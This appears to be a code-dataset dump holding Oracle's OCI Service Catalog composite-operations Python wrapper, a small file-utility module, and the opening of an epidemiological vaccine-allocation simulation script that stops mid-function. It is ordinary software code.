def create_service_catalog_and_wait_for_state(self, create_service_catalog_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.service_catalog.ServiceCatalogClient.create_service_catalog` and waits for the :py:class:`~oci.service_catalog.models.ServiceCatalog` acted upon
to enter the given state(s).
:param oci.service_catalog.models.CreateServiceCatalogDetails create_service_catalog_details: (required)
The details for creating a service catalog.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.service_catalog.models.ServiceCatalog.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.service_catalog.ServiceCatalogClient.create_service_catalog`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.create_service_catalog(create_service_catalog_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_service_catalog(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def delete_private_application_and_wait_for_state(self, private_application_id, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.service_catalog.ServiceCatalogClient.delete_private_application` and waits for the :py:class:`~oci.service_catalog.models.WorkRequest`
to enter the given state(s).
:param str private_application_id: (required)
The unique identifier for the private application.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.service_catalog.models.WorkRequest.status`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.service_catalog.ServiceCatalogClient.delete_private_application`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = None
try:
operation_result = self.client.delete_private_application(private_application_id, **operation_kwargs)
except oci.exceptions.ServiceError as e:
if e.status == 404:
return WAIT_RESOURCE_NOT_FOUND
else:
raise e
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_work_request(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def delete_service_catalog_and_wait_for_state(self, service_catalog_id, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.service_catalog.ServiceCatalogClient.delete_service_catalog` and waits for the :py:class:`~oci.service_catalog.models.ServiceCatalog` acted upon
to enter the given state(s).
:param str service_catalog_id: (required)
The unique identifier for the service catalog.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.service_catalog.models.ServiceCatalog.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.service_catalog.ServiceCatalogClient.delete_service_catalog`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
initial_get_result = self.client.get_service_catalog(service_catalog_id)
operation_result = None
try:
operation_result = self.client.delete_service_catalog(service_catalog_id, **operation_kwargs)
except oci.exceptions.ServiceError as e:
if e.status == 404:
return WAIT_RESOURCE_NOT_FOUND
else:
raise e
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
try:
waiter_result = oci.wait_until(
self.client,
initial_get_result,
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
succeed_on_not_found=True,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_private_application_and_wait_for_state(self, private_application_id, update_private_application_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.service_catalog.ServiceCatalogClient.update_private_application` and waits for the :py:class:`~oci.service_catalog.models.WorkRequest`
to enter the given state(s).
:param str private_application_id: (required)
The unique identifier for the private application.
:param oci.service_catalog.models.UpdatePrivateApplicationDetails update_private_application_details: (required)
The details for updating the private application.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.service_catalog.models.WorkRequest.status`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.service_catalog.ServiceCatalogClient.update_private_application`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_private_application(private_application_id, update_private_application_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_work_request(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_service_catalog_and_wait_for_state(self, service_catalog_id, update_service_catalog_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.service_catalog.ServiceCatalogClient.update_service_catalog` and waits for the :py:class:`~oci.service_catalog.models.ServiceCatalog` acted upon
to enter the given state(s).
:param str service_catalog_id: (required)
The unique identifier for the service catalog.
:param oci.service_catalog.models.UpdateServiceCatalogDetails update_service_catalog_details: (required)
Details to update for a service catalog.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.service_catalog.models.ServiceCatalog.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.service_catalog.ServiceCatalogClient.update_service_catalog`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_service_catalog(service_catalog_id, update_service_catalog_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_service_catalog(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
| <filename>src/oci/service_catalog/service_catalog_client_composite_operations.py
# coding: utf-8
# Copyright (c) 2016, 2022, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
import oci # noqa: F401
from oci.util import WAIT_RESOURCE_NOT_FOUND # noqa: F401
class ServiceCatalogClientCompositeOperations(object):
"""
This class provides a wrapper around :py:class:`~oci.service_catalog.ServiceCatalogClient` and offers convenience methods
for operations that would otherwise need to be chained together. For example, instead of performing an action
on a resource (e.g. launching an instance, creating a load balancer) and then using a waiter to wait for the resource
to enter a given state, you can call a single method in this class to accomplish the same functionality
"""
def __init__(self, client, **kwargs):
"""
Creates a new ServiceCatalogClientCompositeOperations object
:param ServiceCatalogClient client:
The service client which will be wrapped by this object
"""
self.client = client
def change_private_application_compartment_and_wait_for_state(self, private_application_id, change_private_application_compartment_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.service_catalog.ServiceCatalogClient.change_private_application_compartment` and waits for the :py:class:`~oci.service_catalog.models.WorkRequest`
to enter the given state(s).
:param str private_application_id: (required)
The unique identifier for the private application.
:param oci.service_catalog.models.ChangePrivateApplicationCompartmentDetails change_private_application_compartment_details: (required)
The details of the request to change the compartment of a given private application.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.service_catalog.models.WorkRequest.status`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.service_catalog.ServiceCatalogClient.change_private_application_compartment`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.change_private_application_compartment(private_application_id, change_private_application_compartment_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_work_request(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def create_private_application_and_wait_for_state(self, create_private_application_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.service_catalog.ServiceCatalogClient.create_private_application` and waits for the :py:class:`~oci.service_catalog.models.WorkRequest`
to enter the given state(s).
:param oci.service_catalog.models.CreatePrivateApplicationDetails create_private_application_details: (required)
Private application creation details.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.service_catalog.models.WorkRequest.status`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.service_catalog.ServiceCatalogClient.create_private_application`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.create_private_application(create_private_application_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_work_request(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def create_service_catalog_and_wait_for_state(self, create_service_catalog_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.service_catalog.ServiceCatalogClient.create_service_catalog` and waits for the :py:class:`~oci.service_catalog.models.ServiceCatalog` acted upon
to enter the given state(s).
:param oci.service_catalog.models.CreateServiceCatalogDetails create_service_catalog_details: (required)
The details for creating a service catalog.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.service_catalog.models.ServiceCatalog.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.service_catalog.ServiceCatalogClient.create_service_catalog`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.create_service_catalog(create_service_catalog_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_service_catalog(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def delete_private_application_and_wait_for_state(self, private_application_id, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.service_catalog.ServiceCatalogClient.delete_private_application` and waits for the :py:class:`~oci.service_catalog.models.WorkRequest`
to enter the given state(s).
:param str private_application_id: (required)
The unique identifier for the private application.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.service_catalog.models.WorkRequest.status`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.service_catalog.ServiceCatalogClient.delete_private_application`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = None
try:
operation_result = self.client.delete_private_application(private_application_id, **operation_kwargs)
except oci.exceptions.ServiceError as e:
if e.status == 404:
return WAIT_RESOURCE_NOT_FOUND
else:
raise e
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_work_request(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def delete_service_catalog_and_wait_for_state(self, service_catalog_id, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.service_catalog.ServiceCatalogClient.delete_service_catalog` and waits for the :py:class:`~oci.service_catalog.models.ServiceCatalog` acted upon
to enter the given state(s).
:param str service_catalog_id: (required)
The unique identifier for the service catalog.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.service_catalog.models.ServiceCatalog.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.service_catalog.ServiceCatalogClient.delete_service_catalog`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
initial_get_result = self.client.get_service_catalog(service_catalog_id)
operation_result = None
try:
operation_result = self.client.delete_service_catalog(service_catalog_id, **operation_kwargs)
except oci.exceptions.ServiceError as e:
if e.status == 404:
return WAIT_RESOURCE_NOT_FOUND
else:
raise e
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
try:
waiter_result = oci.wait_until(
self.client,
initial_get_result,
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
succeed_on_not_found=True,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_private_application_and_wait_for_state(self, private_application_id, update_private_application_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.service_catalog.ServiceCatalogClient.update_private_application` and waits for the :py:class:`~oci.service_catalog.models.WorkRequest`
to enter the given state(s).
:param str private_application_id: (required)
The unique identifier for the private application.
:param oci.service_catalog.models.UpdatePrivateApplicationDetails update_private_application_details: (required)
The details for updating the private application.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.service_catalog.models.WorkRequest.status`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.service_catalog.ServiceCatalogClient.update_private_application`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_private_application(private_application_id, update_private_application_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_work_request(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_service_catalog_and_wait_for_state(self, service_catalog_id, update_service_catalog_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.service_catalog.ServiceCatalogClient.update_service_catalog` and waits for the :py:class:`~oci.service_catalog.models.ServiceCatalog` acted upon
to enter the given state(s).
:param str service_catalog_id: (required)
The unique identifier for the service catalog.
:param oci.service_catalog.models.UpdateServiceCatalogDetails update_service_catalog_details: (required)
Details to update for a service catalog.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.service_catalog.models.ServiceCatalog.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.service_catalog.ServiceCatalogClient.update_service_catalog`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_service_catalog(service_catalog_id, update_service_catalog_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_service_catalog(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
| en | 0.564346 | # coding: utf-8 # Copyright (c) 2016, 2022, Oracle and/or its affiliates. All rights reserved. # This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license. # noqa: F401 # noqa: F401 This class provides a wrapper around :py:class:`~oci.service_catalog.ServiceCatalogClient` and offers convenience methods for operations that would otherwise need to be chained together. For example, instead of performing an action on a resource (e.g. launching an instance, creating a load balancer) and then using a waiter to wait for the resource to enter a given state, you can call a single method in this class to accomplish the same functionality Creates a new ServiceCatalogClientCompositeOperations object :param ServiceCatalogClient client: The service client which will be wrapped by this object Calls :py:func:`~oci.service_catalog.ServiceCatalogClient.change_private_application_compartment` and waits for the :py:class:`~oci.service_catalog.models.WorkRequest` to enter the given state(s). :param str private_application_id: (required) The unique identifier for the private application. :param oci.service_catalog.models.ChangePrivateApplicationCompartmentDetails change_private_application_compartment_details: (required) The details of the request to change the compartment of a given private application. :param list[str] wait_for_states: An array of states to wait on. These should be valid values for :py:attr:`~oci.service_catalog.models.WorkRequest.status` :param dict operation_kwargs: A dictionary of keyword arguments to pass to :py:func:`~oci.service_catalog.ServiceCatalogClient.change_private_application_compartment` :param dict waiter_kwargs: A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds`` as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait Calls :py:func:`~oci.service_catalog.ServiceCatalogClient.create_private_application` and waits for the :py:class:`~oci.service_catalog.models.WorkRequest` to enter the given state(s). :param oci.service_catalog.models.CreatePrivateApplicationDetails create_private_application_details: (required) Private application creation details. :param list[str] wait_for_states: An array of states to wait on. These should be valid values for :py:attr:`~oci.service_catalog.models.WorkRequest.status` :param dict operation_kwargs: A dictionary of keyword arguments to pass to :py:func:`~oci.service_catalog.ServiceCatalogClient.create_private_application` :param dict waiter_kwargs: A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds`` as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait Calls :py:func:`~oci.service_catalog.ServiceCatalogClient.create_service_catalog` and waits for the :py:class:`~oci.service_catalog.models.ServiceCatalog` acted upon to enter the given state(s). :param oci.service_catalog.models.CreateServiceCatalogDetails create_service_catalog_details: (required) The details for creating a service catalog. :param list[str] wait_for_states: An array of states to wait on. These should be valid values for :py:attr:`~oci.service_catalog.models.ServiceCatalog.lifecycle_state` :param dict operation_kwargs: A dictionary of keyword arguments to pass to :py:func:`~oci.service_catalog.ServiceCatalogClient.create_service_catalog` :param dict waiter_kwargs: A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds`` as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait Calls :py:func:`~oci.service_catalog.ServiceCatalogClient.delete_private_application` and waits for the :py:class:`~oci.service_catalog.models.WorkRequest` to enter the given state(s). :param str private_application_id: (required) The unique identifier for the private application. :param list[str] wait_for_states: An array of states to wait on. These should be valid values for :py:attr:`~oci.service_catalog.models.WorkRequest.status` :param dict operation_kwargs: A dictionary of keyword arguments to pass to :py:func:`~oci.service_catalog.ServiceCatalogClient.delete_private_application` :param dict waiter_kwargs: A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds`` as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait Calls :py:func:`~oci.service_catalog.ServiceCatalogClient.delete_service_catalog` and waits for the :py:class:`~oci.service_catalog.models.ServiceCatalog` acted upon to enter the given state(s). :param str service_catalog_id: (required) The unique identifier for the service catalog. :param list[str] wait_for_states: An array of states to wait on. These should be valid values for :py:attr:`~oci.service_catalog.models.ServiceCatalog.lifecycle_state` :param dict operation_kwargs: A dictionary of keyword arguments to pass to :py:func:`~oci.service_catalog.ServiceCatalogClient.delete_service_catalog` :param dict waiter_kwargs: A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds`` as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait Calls :py:func:`~oci.service_catalog.ServiceCatalogClient.update_private_application` and waits for the :py:class:`~oci.service_catalog.models.WorkRequest` to enter the given state(s). :param str private_application_id: (required) The unique identifier for the private application. :param oci.service_catalog.models.UpdatePrivateApplicationDetails update_private_application_details: (required) The details for updating the private application. :param list[str] wait_for_states: An array of states to wait on. These should be valid values for :py:attr:`~oci.service_catalog.models.WorkRequest.status` :param dict operation_kwargs: A dictionary of keyword arguments to pass to :py:func:`~oci.service_catalog.ServiceCatalogClient.update_private_application` :param dict waiter_kwargs: A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds`` as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait Calls :py:func:`~oci.service_catalog.ServiceCatalogClient.update_service_catalog` and waits for the :py:class:`~oci.service_catalog.models.ServiceCatalog` acted upon to enter the given state(s). :param str service_catalog_id: (required) The unique identifier for the service catalog. :param oci.service_catalog.models.UpdateServiceCatalogDetails update_service_catalog_details: (required) Details to update for a service catalog. :param list[str] wait_for_states: An array of states to wait on. These should be valid values for :py:attr:`~oci.service_catalog.models.ServiceCatalog.lifecycle_state` :param dict operation_kwargs: A dictionary of keyword arguments to pass to :py:func:`~oci.service_catalog.ServiceCatalogClient.update_service_catalog` :param dict waiter_kwargs: A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds`` as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait | 2.307388 | 2 |
vision/_file_utils.py | BrianOfrim/boja | 7 | 9132 | <filename>vision/_file_utils.py
from typing import List
import os
import re
def create_output_dir(dir_name) -> bool:
if not os.path.isdir(dir_name) or not os.path.exists(dir_name):
print("Creating output directory: %s" % dir_name)
try:
os.makedirs(dir_name)
except OSError:
print("Creation of the directory %s failed" % dir_name)
return False
else:
print("Successfully created the directory %s " % dir_name)
return True
else:
return True
def get_files_from_dir(dir_path: str, file_type: str = None) -> List[str]:
if not os.path.isdir(dir_path):
return []
file_paths = [
f for f in os.listdir(dir_path) if os.path.isfile(os.path.join(dir_path, f))
]
if file_type is not None:
file_paths = [f for f in file_paths if f.lower().endswith(file_type.lower())]
return file_paths
def _int_string_sort(file_name) -> int:
match = re.match("[0-9]+", os.path.basename(file_name))
if not match:
return 0
return int(match[0])
def get_highest_numbered_file(
dir_path: str, file_type: str = None, filter_keyword=None
) -> str:
file_names = get_files_from_dir(dir_path)
if file_type is not None:
file_names = [
file_name
for file_name in file_names
if file_name.lower().endswith(file_type.lower())
]
if filter_keyword is not None:
file_names = [
file_name
for file_name in file_names
if filter_keyword.lower() in file_name.lower()
]
if len(file_names) == 0:
return None
highest_numbered_file = sorted(file_names, key=_int_string_sort, reverse=True)[0]
return os.path.join(dir_path, highest_numbered_file)
| <filename>vision/_file_utils.py
from typing import List
import os
import re
def create_output_dir(dir_name) -> bool:
if not os.path.isdir(dir_name) or not os.path.exists(dir_name):
print("Creating output directory: %s" % dir_name)
try:
os.makedirs(dir_name)
except OSError:
print("Creation of the directory %s failed" % dir_name)
return False
else:
print("Successfully created the directory %s " % dir_name)
return True
else:
return True
def get_files_from_dir(dir_path: str, file_type: str = None) -> List[str]:
if not os.path.isdir(dir_path):
return []
file_paths = [
f for f in os.listdir(dir_path) if os.path.isfile(os.path.join(dir_path, f))
]
if file_type is not None:
file_paths = [f for f in file_paths if f.lower().endswith(file_type.lower())]
return file_paths
def _int_string_sort(file_name) -> int:
match = re.match("[0-9]+", os.path.basename(file_name))
if not match:
return 0
return int(match[0])
def get_highest_numbered_file(
dir_path: str, file_type: str = None, filter_keyword=None
) -> str:
file_names = get_files_from_dir(dir_path)
if file_type is not None:
file_names = [
file_name
for file_name in file_names
if file_name.lower().endswith(file_type.lower())
]
if filter_keyword is not None:
file_names = [
file_name
for file_name in file_names
if filter_keyword.lower() in file_name.lower()
]
if len(file_names) == 0:
return None
highest_numbered_file = sorted(file_names, key=_int_string_sort, reverse=True)[0]
return os.path.join(dir_path, highest_numbered_file)
| none | 1 | 3.299281 | 3 |
|
vaccine_allocation/epi_simulations.py | COVID-IWG/epimargin-studies | 0 | 9133 | import dask
import numpy as np
import pandas as pd
from epimargin.models import Age_SIRVD
from epimargin.utils import annually, normalize, percent, years
from studies.vaccine_allocation.commons import *
from tqdm import tqdm
import warnings
warnings.filterwarnings("error")
num_sims = 1000
simulation_range = 1 * years
phi_points = [_ * percent * annually for _ in (25, 50, 100, 200)]
simulation_initial_conditions = pd.read_csv(data/f"all_india_coalesced_scaling_Apr15.csv")\
.drop(columns = ["Unnamed: 0"])\
.set_index(["state", "district"])
rerun_states = ["Telangana", "Uttarakhand", "Jharkhand", "Arunachal Pradesh", "Nagaland", "Sikkim"] + coalesce_states
districts_to_run = simulation_initial_conditions
num_age_bins = 7
seed = 0
MORTALITY = [6, 5, 4, 3, 2, 1, 0]
CONTACT = [1, 2, 3, 4, 0, 5, 6]
CONSUMPTION = [4, 5, 6, 3, 2, 1, 0]
def save_metrics(tag, policy, dst = tev_src):
np.savez_compressed(dst/f"{tag}.npz",
dT = policy.dT_total,
dD = policy.dD_total,
pi = policy.pi,
q0 = policy.q0,
q1 = policy.q1,
Dj = policy.D
)
def prioritize(num_doses, S, prioritization):
Sp = S[:, prioritization]
dV = np.where(Sp.cumsum(axis = 1) <= num_doses, Sp, 0)
dV[np.arange(len(dV)), (Sp.cumsum(axis = 1) > dV.cumsum(axis = 1)).argmax(axis = 1)] = num_doses - dV.sum(axis = 1)
return dV[:, sorted(range(len(prioritization)), key = prioritization.__getitem__)].clip(0, S)
def process(district_data):
(
(state, district), state_code,
sero_0, N_0, sero_1, N_1, sero_2, N_2, sero_3, N_3, sero_4, N_4, sero_5, N_5, sero_6, N_6, N_tot,
Rt, Rt_upper, Rt_lower, S0, I0, R0, D0, dT0, dD0, V0, T_ratio, R_ratio
) = district_data
try:
S0 = int(S0)
except ValueError as e:
print (state, district, e)
return
Sj0 = np.array([(1 - sj) * Nj for (sj, Nj) in zip([sero_0, sero_1, sero_2, sero_3, sero_4, sero_5, sero_6], [N_0, N_1, N_2, N_3, N_4, N_5, N_6])])
# distribute historical doses assuming mortality prioritization
Sj0 = prioritize(V0, Sj0.copy()[None, :], MORTALITY)[0]
def get_model(seed = 0):
model = Age_SIRVD(
name = state_code + "_" + district,
population = N_tot - D0,
dT0 = (np.ones(num_sims) * dT0).astype(int),
